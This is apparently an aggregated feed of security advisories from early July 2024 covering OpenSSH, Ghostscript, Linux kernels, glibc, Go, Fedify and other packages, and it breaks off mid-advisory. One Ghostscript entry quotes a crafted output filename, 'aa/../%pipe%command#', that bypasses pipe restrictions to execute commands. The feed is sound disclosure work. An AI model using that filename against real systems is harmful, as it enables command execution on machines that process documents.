02.07.2024 17:13:09	rockylinux	[RLSA-2024:4084] git security update (important)	An update is available for git.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4084
02.07.2024 16:44:50	ubuntu	[USN-6860-1] OpenVPN vulnerabilities	Several security issues were fixed in OpenVPN.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6860-1
03.07.2024 00:23:42	almalinux	[ALSA-2024:4212] golang security update (moderate)	golang security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4212
02.07.2024 18:12:02	almalinux	[ALSA-2024:4211] kernel security and bug fix update (important)	kernel security and bug fix update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4211
04.07.2024 00:26:05	slackware	[SSA:2024-185-02] httpd	New httpd packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/httpd-2.4.61-i586-1_slack15.0.txz: Upgraded. This update contains the fix for the 2.4.60 regression, which has also been assigned a CVE. We fixed this already, but we'll make it official. For more information, see: https://downloads.apache.org/httpd/CHANGES_2.4 https://www.cve.org/CVERecord?id=CVE-2024-39884 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/httpd-2.4.61-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/httpd-2.4.61-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.61-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.61-x86_64-1.txzMD5 signaturesSlackware 15.0 package:6382c01b1d266e87996b63a9898a98df httpd-2.4.61-i586-1_slack15.0.txzSlackware x86_64 15.0 package:b9df01c7110b3948901e980ac67936c2 httpd-2.4.61-x86_64-1_slack15.0.txzSlackware -current package:e3ed6307309d9d6d568aa9a70ee98cbd n/httpd-2.4.61-i586-1.txzSlackware x86_64 -current package:f6e9a6faf7447f052c50e15893be88ed n/httpd-2.4.61-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg httpd-2.4.61-i586-1_slack15.0.txz`Then, restart Apache httpd:`# /etc/rc.d/rc.httpd stop``# /etc/rc.d/rc.httpd start`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-185-02
03.07.2024 22:15:03	alpinelinux	[ALPINE:CVE-2024-29510] ghostscript vulnerability	[From CVE-2024-29510] Artifex Ghostscript before 10.03.1 allows memory corruption, and SAFER sandbox bypass, via format string injection with a uniprint device.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-29510
03.07.2024 22:15:03	alpinelinux	[ALPINE:CVE-2024-33869] ghostscript vulnerability	[From CVE-2024-33869] An issue was discovered in Artifex Ghostscript before 10.03.1. Path traversal and command execution can occur (via a crafted PostScript document) because of path reduction in base/gpmisc.c. For example, restrictions on use of %pipe% can be bypassed via the aa/../%pipe%command# output filename.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-33869
03.07.2024 22:15:03	alpinelinux	[ALPINE:CVE-2024-33870] ghostscript vulnerability	[From CVE-2024-33870] An issue was discovered in Artifex Ghostscript before 10.03.1. There is path traversal (via a crafted PostScript document) to arbitrary files if the current directory is in the permitted paths. For example, there can be a transformation of ../../foo to ./../../foo and this will grant access if ./ is permitted.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-33870
03.07.2024 22:15:03	alpinelinux	[ALPINE:CVE-2024-33871] ghostscript vulnerability	[From CVE-2024-33871] An issue was discovered in Artifex Ghostscript before 10.03.1. contrib/opvp/gdevopvp.c allows arbitrary code execution via a custom Driver library, exploitable via a crafted PostScript document. This occurs because the Driver parameter for opvp (and oprp) devices can have an arbitrary name for a dynamic library; this library is then loaded.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-33871
03.07.2024 21:55:17	slackware	[SSA:2024-185-01] netatalk (critical)	New netatalk packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/netatalk-3.2.1-i586-1_slack15.0.txz: Upgraded. Shared library .so-version bump. Fixed security issues that could lead to a denial of service or the execution of arbitrary code. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-38439 https://www.cve.org/CVERecord?id=CVE-2024-38440 https://www.cve.org/CVERecord?id=CVE-2024-38441 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/netatalk-3.2.1-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/netatalk-3.2.1-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/netatalk-3.2.1-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/netatalk-3.2.1-x86_64-1.txzMD5 signaturesSlackware 15.0 package:fc31b84f5813cccdc0c8860f5d53e241 netatalk-3.2.1-i586-1_slack15.0.txzSlackware x86_64 15.0 package:0d14cc40ed92e7047ce90874ffd46bd9 netatalk-3.2.1-x86_64-1_slack15.0.txzSlackware -current package:b15d5cc0696c21ed1b202d588a0bfedf n/netatalk-3.2.1-i586-1.txzSlackware x86_64 -current package:4d63ba62283559c020182e7db9d0f6e1 n/netatalk-3.2.1-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg netatalk-3.2.1-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-185-01
03.07.2024 18:41:43	go	[GO-2024-2965] Pomerium exposed OAuth2 access and ID tokens in user info endpoint response in github.com/pomerium/pomerium (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2965
03.07.2024 08:46:30	ubuntu	[USN-6862-1] Firefox vulnerabilities (high)	Several security issues were fixed in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6862-1
03.07.2024 03:00:00	debian	[DSA-5725-1] znc	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5725-1
03.07.2024 03:00:00	oraclelinux	[ELSA-2024-4231] python-jinja2 security update (moderate)	[2.10.1-5]- Security fix for CVE-2024-34064Resolves: RHEL-35651	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4231
03.07.2024 03:00:00	oraclelinux	[ELSA-2024-4241] iperf3 security update (moderate)	[3.5-10]- Resolves: RHEL-29578 - vulnerable to marvin attack if the authentication option is used[3.5-9]- Resolves: RHEL-17069 - possible denial of service[3.5-8]- Related: #2222205 - bumping nvr for correct update path	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4241
03.07.2024 03:00:00	oraclelinux	[ELSA-2024-4242] libreoffice security update (moderate)	[6.4.7.2-17.0.1]- Replace colors with Oracle colors [Orabug: 32120093]- Build with --with-vendor='Oracle America, Inc.'- Added the --with-hamcrest option to configure.[6.4.7.2]- Remove Red Hat branding- Change vendor to RESF[1:6.4.7.2-17]- Fix CVE-2024-3044 add notify for script use	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4242
03.07.2024 03:00:00	oraclelinux	[ELSA-2024-4245] python3 security update (moderate)	[1.1.0-3]- Security fix for CVE-2024-36039Resolves: RHEL-38366	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4245
03.07.2024 03:00:00	oraclelinux	[ELSA-2024-4260] python-idna security update (moderate)	[2.5-7]- Fix patch application for security fix for CVE-2024-3651Resolves: RHEL-32703[2.5-6]- Security fix for CVE-2024-3651Resolves: RHEL-32703	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4260
03.07.2024 03:00:00	redhat	[RHSA-2024:4312] openssh security update (important)	OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.Security Fix(es):* openssh: Possible remote code execution due to a race condition in signal handling (CVE-2024-6387)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4312
03.07.2024 03:00:00	oraclelinux	[ELSA-2024-12472] glibc security update (important)	[2.34-100.0.1.2]- Forward-port Oracle patches for ol9-u4 Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> Oracle history: April-30-2024 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-100.0.1 - Forward-port Oracle patches for ol9-u4 Reviewed by: Indu Bhagat <indu.bhagat@oracle.com> March-28-2024 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-100.0.1 - Forward-port Oracle patches for ol9-u4-beta Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> March 15 2024 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-83.0.2.12 - Forward-port Oracle patches for ol9 Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> February-26-2024 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-83.0.2.7 - OraBug 36322437 getaddrinfo does not return correct ipv6 address and family Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> October-24-2023 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-83.0.1.7 - Forward-port Oracle patches for ol9 Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> October-4-2023 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-82.0.1 - Forward-port Oracle patches for ol9 Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> April-18-2023 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-60.0.2 - OraBug 35305078 Glibc tunable to disable huge pages on pthread_create stacks - Created tunable glibc.pthread.stack_hugetlb to control when hugepages can be used for stack allocation. - In case THP are enabled and glibc.pthread.stack_hugetlb is set to 0, glibc will madvise the kernel not to use allow hugepages for stack allocations. Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> March-28-2023 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-60.0.1 - Merge Oracle patches for ol9-u2 beta Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> September-28-2022 Patrick McGehearty <patrick.mcgehearty@oracle.com> - 2.34-40.0.1 - Merge Oracle patches for ol9-u1 beta Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> April-25-2022 Patrick McGehearty <patrick.mcgehearty@oracle.com> - 2.34-28.0.1 - Merge Oracle patches with ol9 beta - Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com>[2.34-100.2]- CVE-2024-33599: nscd: buffer overflow in netgroup cache (RHEL-34318)- CVE-2024-33600: nscd: null pointer dereferences in netgroup cache- CVE-2024-33601: nscd: crash on out-of-memory condition- CVE-2024-33602: nscd: memory corruption with NSS netgroup modules[2.34-100.1]- CVE-2024-2961: Out of bounds write in iconv conversion to ISO-2022-CN-EXT (RHEL-32480)[2.34-100]- manual: fix order of arguments of memalign and aligned_alloc (RHEL-21556)[2.34-99]- getaddrinfo: Return correct error EAI_MEMORY when out-of-memory (RHEL-19444)[2.34-98]- getaddrinfo: Fix occasionally empty result due to nscd cache order (RHEL-16643)[2.34-97]- Re-enable output buffering for wide stdio streams (RHEL-19862)[2.34-96]- Fix TLS corruption during dlopen()/dlclose() sequences (RHEL-17465)[2.34-95]- Improve compatibility between underlinking and IFUNC resolvers (RHEL-17319)[2.34-94]- Update syscall-names.list for Linux 6.6. (RHEL-16016)[2.34-93]- malloc: Use __get_nprocs on arena_get2. (RHEL-17157)[2.34-92]- Improve test coverage for wcsdup, strdup and strndup. (RHEL-15343)[2.34-91]- fstat performance enhancement (RHEL-2338)[2.34-90]- ldconfig should skip temporary files created by RPM (RHEL-14383)[2.34-89]- Fix force-first handling in dlclose (RHEL-2491)[2.34-88]- nscd: Refer to /run instead of /var/run in systemd socket file (RHEL-16275)[2.34-87]- Fix slow tls access after dlopen (RHEL-2123)[2.34-86]- Add /usr/share/doc/glibc/gai.conf to glibc-doc (RHEL-14545)[2.34-85]- nscd: Skip unusable entries in first pass in prune_cache (RHEL-3397)[2.34-84]- x86-64: Report non-zero cache sizes under TDX hypervisors (RHEL-1191)[2.34-83.7]- Fix memory leak regression in getaddrinfo (RHEL-2426)[2.34-83.6]- CVE-2023-4911 glibc: buffer overflow in ld.so leading to privilege escalation (RHEL-3000)[2.34-83.5]- Revert: Always call destructors in reverse constructor order (RHEL-2491)[2.34-83.4]- CVE-2023-4806 glibc: potential use-after-free in getaddrinfo (RHEL-2426)[2.34-83.3]- CVE-2023-4813: potential use-after-free in gaih_inet (RHEL-2438)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12472
03.07.2024 03:00:00	oraclelinux	[ELSA-2024-4235] 389-ds security update (important)	[1.4.3.39-7]- Bump version to 1.4.3.39-7- Resolves: RHEL-16277 - LDAP connections are closed with code T2 before the IO block timeout is reached. [rhel-8.10.0.z][1.4.3.39-6]- Bump version to 1.4.3.39-6- Resolves: RHEL-16277 - LDAP connections are closed with code T2 before the IO block timeout is reached. [rhel-8.10.0.z][1.4.3.39-5]- Bump version to 1.4.3.39-5- Resolves: RHEL-16277 - LDAP connections are closed with code T2 before the IO block timeout is reached. [rhel-8.10.0.z][1.4.3.39-4]- Bump version to 1.4.3.39-4- Resolves: RHEL-34818 - redhat-ds:11/389-ds-base: Malformed userPassword may cause crash at do_modify in slapd/modify.c- Resolves: RHEL-34824 - redhat-ds:11/389-ds-base: potential denial of service via specially crafted kerberos AS-REQ request	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4235
03.07.2024 03:00:00	oraclelinux	[ELSA-2024-4237] go-toolset security update (moderate)	delve[1.21.2-3.0.1]- Disable DWARF compression which has issues (Alex Burmashev)[1.21.2-3]- Skip an additional test as it's breaking in the CI system.- Modify the name of the patch.- Resolves: RHEL-22820[1.21.2-2]- Fix: Remove architectures from exclude ExcludeArch- Resolves: RHEL-22820[1.21.2-1]- Rebase to 1.21.2- Add support for ppc64le and aarch64- Enable the test suite- Modify ports: Some CI systems complain about the usage of the 8888 port.- Improve the way PPC64LE support is enabled.- Resolves: RHEL-22820golang[1.21.11-1]- Update to Go1.21.11 to address CVE-2024-24789 and CVE-2024-24790- Resolves: RHEL-40274[1.21.10]- Update to Go 1.21.10- Resolves: RHEL-36993go-toolset[1.21.11-1]- Rebase to Go1.21.11 that includes fixes for CVE-2024-24789 and CVE-2024-24790- Resolves: RHEL-40274[1.21.10-1]- Update to Go 1.21.10- Resolves: RHEL-36993	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4237
03.07.2024 03:00:00	oraclelinux	[ELSA-2024-4246] container-tools security update (moderate)	aardvark-dns[2:1.10.0-1]- update to https://github.com/containers/aardvark-dns/releases/tag/v1.10.0- Related: Jira:RHEL-2110[2:1.9.0-1]- update to https://github.com/containers/aardvark-dns/releases/tag/v1.9.0- Related: Jira:RHEL-2110[2:1.8.0-1]- update to https://github.com/containers/aardvark-dns/releases/tag/v1.8.0- Related: Jira:RHEL-2110buildah[2:1.33.8-1]- update to the latest content of https://github.com/containers/buildah/tree/release-1.33 (https://github.com/containers/buildah/commit/b65a814)- Resolves: RHEL-40850cockpit-podmanconmoncontainernetworking-pluginscontainers-commoncontainer-selinuxcriu[3.18-5]- rebuild to preserve upgrade path- Related: RHEL-32671crunfuse-overlayfslibslirp[4.4.0-2]- rebuild to preserve upgrade path 8.9 -> 8.10- Related: RHEL-32671netavarkoci-seccomp-bpf-hookpodman[4.9.4-4.0.1]- Add devices on container startup, not on creation[4:4.9.4-4]- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/1a6dca2)- Resolves: RHEL-40851python-podmanruncskopeo[2:1.14.4-1]- update to the latest content of https://github.com/containers/skopeo/tree/release-1.14 (https://github.com/containers/skopeo/commit/78d9c9a)- Resolves: RHEL-40852slirp4netnsudica[0.2.6-21]- bump release to preserve update path- Resolves: RHEL-32671[0.2.6-20]- bump release to preserve update path- Related: #2139052	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4246
03.07.2024 01:15:04	alpinelinux	[ALPINE:CVE-2024-24791] go vulnerability	[From CVE-2024-24791] The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail. An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24791
03.07.2024 16:48:10	go	[GO-2024-2567] Panic in Pipeline when PgConn is busy or closed in github.com/jackc/pgx	Pipeline can panic when PgConn is busy or closed.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2567
03.07.2024 18:15:20	almalinux	[ALSA-2024:4249] c-ares security update (low)	c-ares security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4249
03.07.2024 14:45:56	almalinux	[ALSA-2024:4252] nghttp2 security update (moderate)	nghttp2 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4252
03.07.2024 14:41:24	almalinux	[ALSA-2024:4256] less security update (important)	less security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4256
03.07.2024 17:16:03	almalinux	[ALSA-2024:4259] xmlrpc-c security and bug fix update (moderate)	xmlrpc-c security and bug fix update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4259
03.07.2024 14:38:16	almalinux	[ALSA-2024:4260] python-idna security update (moderate)	python-idna security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4260
03.07.2024 14:33:34	almalinux	[ALSA-2024:4264] openldap security update (low)	openldap security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4264
03.07.2024 14:27:59	almalinux	[ALSA-2024:4265] cups security update (moderate)	cups security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4265
03.07.2024 17:21:11	almalinux	[ALSA-2024:4227] python-pillow security update (moderate)	python-pillow security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4227
03.07.2024 17:19:15	almalinux	[ALSA-2024:4231] python-jinja2 security update (moderate)	python-jinja2 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4231
03.07.2024 15:24:12	almalinux	[ALSA-2024:4237] go-toolset security update (moderate)	go-toolset security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4237
03.07.2024 17:17:31	almalinux	[ALSA-2024:4241] iperf3 security update (moderate)	iperf3 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4241
03.07.2024 15:16:48	almalinux	[ALSA-2024:4243] python3 security update (moderate)	python3 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4243
03.07.2024 15:11:03	almalinux	[ALSA-2024:4244] python3.11-PyMySQL security update (moderate)	python3.11-PyMySQL security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4244
03.07.2024 15:05:43	almalinux	[ALSA-2024:4245] python3 security update (moderate)	python3 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4245
03.07.2024 15:02:00	almalinux	[ALSA-2024:4246] container-tools security update (moderate)	container-tools security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4246
03.07.2024 14:49:51	almalinux	[ALSA-2024:4247] libuv security update (moderate)	libuv security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4247
03.07.2024 17:14:44	almalinux	[ALSA-2024:4267] fontforge security update (moderate)	fontforge security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4267
03.07.2024 17:13:47	almalinux	[ALSA-2024:4278] qemu-kvm security update (important)	qemu-kvm security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4278
03.07.2024 03:00:00	freebsd	[FREEBSD:B0374722-3912-11EF-A77E-901B0E9408DC] go -- net/http: denial of service due to improper 100-continue handling	The Go project reports: net/http: denial of service due to improper 100-continue handling The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail. An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:B0374722-3912-11EF-A77E-901B0E9408DC
04.07.2024 23:25:40	ubuntu	[USN-6879-1] Virtuoso Open-Source Edition vulnerabilities (high)	Virtuoso Open-Source Edition could be made to crash if it receivedspecially crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6879-1
04.07.2024 22:11:24	ubuntu	[USN-6866-2] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6866-2
04.07.2024 20:50:51	ubuntu	[USN-6870-2] Linux kernel (AWS) vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6870-2
04.07.2024 19:56:28	ubuntu	[USN-6873-2] Linux kernel (StarFive) vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6873-2
04.07.2024 19:43:29	ubuntu	[USN-6864-2] Linux kernel vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6864-2
04.07.2024 19:35:24	ubuntu	[USN-6872-2] Linux kernel vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6872-2
04.07.2024 19:25:18	ubuntu	[USN-6876-1] Kopano Core vulnerabilities (critical)	Several security issues were fixed in Kopano Core.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6876-1
04.07.2024 18:29:41	ubuntu	[USN-6878-1] Linux kernel (Oracle) vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6878-1
04.07.2024 16:18:59	ubuntu	[USN-6877-1] LibreOffice vulnerability	LibreOffice could be made to expose sensitive information.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6877-1
04.07.2024 12:15:04	alpinelinux	[ALPINE:CVE-2024-39884] apache2 vulnerability	[From CVE-2024-39884] A regression in the core of Apache HTTP Server 2.4.60 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted.Users are recommended to upgrade to version 2.4.61, which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-39884
04.07.2024 05:24:01	ubuntu	[USN-6875-1] Linux kernel (Azure) vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6875-1
04.07.2024 05:21:18	ubuntu	[USN-6864-1] Linux kernel vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6864-1
04.07.2024 05:18:51	ubuntu	[USN-6863-1] Linux kernel vulnerability (medium)	The system could be made to crash or run programs as an administrator.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6863-1
04.07.2024 05:00:38	ubuntu	[USN-6874-1] Linux kernel (Azure) vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6874-1
04.07.2024 04:58:30	ubuntu	[USN-6873-1] Linux kernel vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6873-1
04.07.2024 04:55:57	ubuntu	[USN-6872-1] Linux kernel vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6872-1
04.07.2024 04:32:14	ubuntu	[USN-6871-1] Linux kernel (HWE) vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6871-1
04.07.2024 04:25:51	ubuntu	[USN-6870-1] Linux kernel vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6870-1
04.07.2024 04:06:30	ubuntu	[USN-6869-1] Linux kernel vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6869-1
04.07.2024 03:00:00	oraclelinux	[ELSA-2024-4312] openssh security update (important)	[8.7p1-38.0.2.1]- Update upstream references [Orabug: 36564626][8.7p1-38.1]- Possible remote code execution due to a race condition (CVE-2024-6387) Resolves: RHEL-45347	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4312
04.07.2024 02:04:31	ubuntu	[USN-6868-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6868-1
04.07.2024 00:40:16	ubuntu	[USN-6867-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6867-1
04.07.2024 18:29:42	rubysec	[RUBYSEC:RACK-2024-39316] Rack ReDoS Vulnerability in HTTP Accept Headers Parsing (medium)	### SummaryA Regular Expression Denial of Service (ReDoS) vulnerability existsin the `Rack::Request::Helpers` module when parsing HTTP Accept headers.This vulnerability can be exploited by an attacker sending speciallycrafted `Accept-Encoding` or `Accept-Language` headers, causing theserver to spend excessive time processing the request and leadingto a Denial of Service (DoS).### DetailsThe fix for https://github.com/rack/rack/security/advisories/GHSA-54rr-7fvw-6x8fwas not applied to the main branch and thus while the issue was fixedfor the Rack v3.0 release series, it was not fixed in the v3.1release series until v3.1.5.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-2024-39316
04.07.2024 10:29:57	almalinux	[ALSA-2024:4235] 389-ds security update (important)	389-ds security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4235
04.07.2024 09:42:12	almalinux	[ALSA-2024:4242] libreoffice security update (moderate)	libreoffice security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4242
05.07.2024 23:07:55	npm	[NPM:GHSA-P9CG-VQCC-GRCX] Server Side Request Forgery (SSRF) attack in Fedify (high)	### Summary At present, when Fedify needs to retrieve an object or activity from a remote activitypub server, it makes a HTTP request to the `@id` or other resources present within the activity it has received from the web. This activity could reference an `@id` that points to an internal IP address, allowing an attacker to send request to resources internal to the fedify server's network.This applies to not just resolution of documents containing activities or objects, but also to media URLs as well.Specifically this is a [Server Side Request Forgery attack](https://owasp.org/www-community/attacks/Server_Side_Request_Forgery). You can learn more about SSRF attacks via [CWE-918](https://cwe.mitre.org/data/definitions/918.html)### DetailsWhen Fedify makes a request at runtime via the DocLoader [1] [2], the `fetch` API does not first check the URI's to assert that it resolve to a public IP address. Additionally, any downstream software of Fedify that may fetch data from URIs contained within Activities or Objects maybe be at risk of requesting non-public resources, and storing those, exposing non-public information to the public.Additionally, in many cases the URIs are not asserted to be either strictly HTTPS or HTTP protocols, which could lead to further attacks, and there is no check that the URI contains a `hostname` part. Whilst the [`fetch()` specification](https://fetch.spec.whatwg.org/) may provide some safety here, along with underlying fetch implementations, there is still potential for attacks through using `data:` URIs, or just attacking some other protocol entirely, e.g., FTP or CalDav.[1] https://github.com/dahlia/fedify/blob/main/runtime/docloader.ts#L141[2] https://github.com/dahlia/fedify/blob/main/runtime/docloader.ts#L175#### Deno-specific Attack VectorsIn Deno specifically, the `fetch()` API allows [accessing local filesystem](https://docs.deno.com/deploy/api/runtime-fetch/), I'm not sure how Deno's [Permissions model](https://docs.deno.com/runtime/manual/runtime/permission_apis/) may prevent attacks utilising `file:` URIs. > Fetch also supports fetching from file URLs to retrieve static files. For more info on static files, see the [filesystem API documentation](https://docs.deno.com/deploy/api/runtime-fs).#### ActivityPub Security ConsiderationsThis is also noted in the ActivityPub spec in [Section B.3 Security Considerations](https://www.w3.org/TR/activitypub/#security-localhost), however, there it is more limited in scope.#### Other ImplementationsIt may be acceptable to allow a server operator to allow access to given non-public IP addresses, for instance [in Mastodon](https://github.com/mastodon/mastodon/blob/092bb8a27af9ee87ff9ebabaf354477470ea3a94/app/lib/request.rb#L330) they allow requests to non-public IP addresses, i.e., localhost in development and those in the `ALLOWED_PRIVATE_ADDRESSES` environment variable.### PoCI'm not sure a PoC is necessary given this is a reasonably well known vulnerability vector.### ImpactThis impacts server 